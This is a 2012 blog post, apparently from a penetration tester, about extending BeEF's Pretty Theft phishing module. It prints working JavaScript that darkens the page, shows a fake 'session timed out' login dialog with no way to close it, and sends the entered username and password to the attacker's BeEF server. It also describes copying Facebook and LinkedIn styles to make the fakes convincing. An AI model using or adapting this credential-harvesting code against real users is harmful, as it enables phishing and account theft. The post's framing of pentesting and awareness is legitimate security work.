Tuesday, 2 October 2012

Update to the Pretty Theft (phishing) module in BeEF

Hi all,

Today I'm going to be talking a bit more about BeEF and specifically the Pretty Theft module.

For those of you who don't know, BeEF (the browser exploitation framework) is a tool that cleverly uses the browser's built in functionality, javascript and other third party software against the user. What's interesting is that it doesn't rely on any exploit (although this is also possible) to get the job done, so even if you are fully patched, you can still be attacked using beef.

Initial compromise of the user's browser usually relies on either XSS, luring the user to your own website containing malicious javascript or MITM injection of javascript. Once a user runs the beef hook javascript their browser silently connects back to the beef admin and you can deploy any of the 125 beef modules.

Beef is included with Backtrack but you probably want to do a git clone to get the latest version (see previous post!). For more info the beef site is here: http://beefproject.com/

So what is the Pretty Theft module?

The pretty theft module is a phishing module that uses floating divs to create legitimate looking fake login boxes that are displayed in the browser. It was originally created by Nickosaurus Hax (http://atta.cked.me/home). I really liked the idea of the module but it was quite basic, there was only one default pop up and it looked really fake. To make the module more effective I decided to try and add some additional pop up boxes with different styles.

The original pretty theft dialog box:

To start with I wanted to create a Facebook pop up, a LinkedIn pop up and also to update some of the module logic.

How does Pretty Theft work?

The module starts by creating a semi transparent grey background that covers the whole page, this prevents the user from interacting with the page and forces them to confront the pop up box.

(Code slightly edited for blog)

//Define properties
var zindex = options.zindex || 50;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');

//Build layer and position
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the dark layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
dark=document.getElementById('darkenScreenObject'); // Get the object.

//Assign style properties
dark.style.width= pageWidth;
dark.style.height= pageHeight;

Next a separate div is created to simulate a pop up window, the style and positioning is defined and it is appended to the page.

// Generic floating div with image
function generic() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'popup');
sneakydiv.setAttribute('style', 'width:400px;position:absolute; top:30%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
sneakydiv.setAttribute('align', 'center');

sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"buttonpress\").value=\"true\";\' value=\'Ok\'><br/><input type="hidden" id="buttonpress" name="buttonpress" value="false"/>';

// Repeatedly check if button has been pressed
credgrabber = setInterval(checker,1000);


Once the ok button is pressed a hidden variable is set to true. The checker function is called every second and will verify that the button has been pressed and the input boxes contain some data. If everything checks out the data is sent to the beef admin and the divs are removed from the page, leaving the user to carry on browsing happily. If the user didn't enter any data they are prompted with an alert and sent back to the dialog box.

function checker(){
uname1 = document.body.lastChild.getElementsByTagName("input")[0].value;
pass1 = document.body.lastChild.getElementsByTagName("input")[1].value;
valcheck = document.body.lastChild.getElementsByTagName("input")[3].value;

if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") {
// Join user/pass and send to attacker
answer = uname1+":"+pass1
  beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
// Set lastchild invisible
// Lighten screen

}else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){
// If user has not entered any data reset button
document.body.lastChild.getElementsByTagName("input")[3].value = "false";
alert("Please enter a valid username and password.");

What sneaky tricks do you use to fool the user?

I'd say the most important aspect of effective phishing or social engineering of any kind is being convincing. By making your malicious activity as realistic as possible the user will assume its perfectly normal and happily go along with it.

To achieve this I focused on getting as close as I could to the real styles used by Facebook and LinkedIn. I used a combination of info from web/forums/blogs etc. and also inspection of the actual website code, using the built in Google Developer Tools. In Chrome you just right click any page element and select "Inspect element" and bam you get the code. Super useful for borrowing code and styles.

The second aspect I focused on was the module logic and how the user interacted with the dialog box. Most legitimate dialog boxes give you two choices, continue or cancel. To ensure the user interacted with the div I only had a continue box. I didn't add a cancel button or any other way to close the box for example a cross in the top right hand corner. This forces the user to confront the box and enter credentials. Another design choice was the verification of user input data. I added a check to ensure that the user has entered a username and password, if either is missing an alert box is used to prompt them to enter valid data. Every little bit helps when trying to scam that end user :)

Final Product: Real vs Fake

A real Facebook message box:

My fake Facebook dialog box:


If I get some time I'd like to improve the appearance of the pop ups, add more pop ups and clean up the code a bit. IE6 is not supported at the moment, it flat out refused to layer the divs. Border opacity was something I didn't end up finishing as the child elements were inheriting the opacity creating semi visible pop up boxes. I just needed to create a seperate div for it but there were some positioning issues. Definitely something that can be fixed, I was just too lazy :)

The beef framework brilliantly demonstrates how lethal even the smallest bit of javascript can be and how important it is to use NoScript. Through modules like Pretty Theft it's really easy to demonstrate the kinds of the attacks organisations are facing today and how to best defend against them. If you've not played with BeEF before I suggest you go grab a copy. If you are using Backtrack, to make it work you first need to grab the latest edition and then install bundler within the beef directory. Commands are below:

rm -rf /pentest/web/beef && git clone https://github.com/beefproject/beef.git /pentest/web/beef

gem install --user-install bundler

As usual if you have any suggestions or questions feel free to comment below.



No comments:

Post a Comment